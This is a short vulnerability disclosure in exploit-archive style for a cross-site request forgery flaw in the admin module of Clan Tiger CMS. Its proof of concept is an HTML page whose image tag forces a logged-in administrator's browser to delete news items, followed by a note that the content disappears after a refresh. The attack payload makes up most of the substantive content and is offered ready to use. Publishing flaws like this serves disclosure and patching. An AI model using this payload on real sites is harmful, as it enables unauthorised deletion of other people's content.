41 lines
No EOL
1.4 KiB
HTML
Executable file
41 lines
No EOL
1.4 KiB
HTML
Executable file
=======================================================================
|
|
|
|
Clain_TIger_CMS CSRF Vulnerability
|
|
|
|
=======================================================================
|
|
|
|
# Vulnerability found in- Admin module
|
|
# email Pratulag@yahoo.com
|
|
# company aksitservices
|
|
# Credit by Pratul Agrawal
|
|
# Software Clan Tiger_CMS
|
|
# Category CMS / Portals
|
|
# Site p4ge http://server/clantiger/index.php?module=login
|
|
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
|
|
|
|
|
|
|
|
# Proof of concept #
|
|
|
|
Targeted URL: http://servername/clantiger/
|
|
|
|
|
|
Script to Delete the News content through Cross Site request forgery
|
|
|
|
. ................................................................................................................
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<img src=http://server/clantiger/index.php?module=news&action=remove&id=[user ID] />
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
. ..................................................................................................................
|
|
|
|
|
|
|
|
After execution refresh the page and u can see that a added content is deleted automatically. |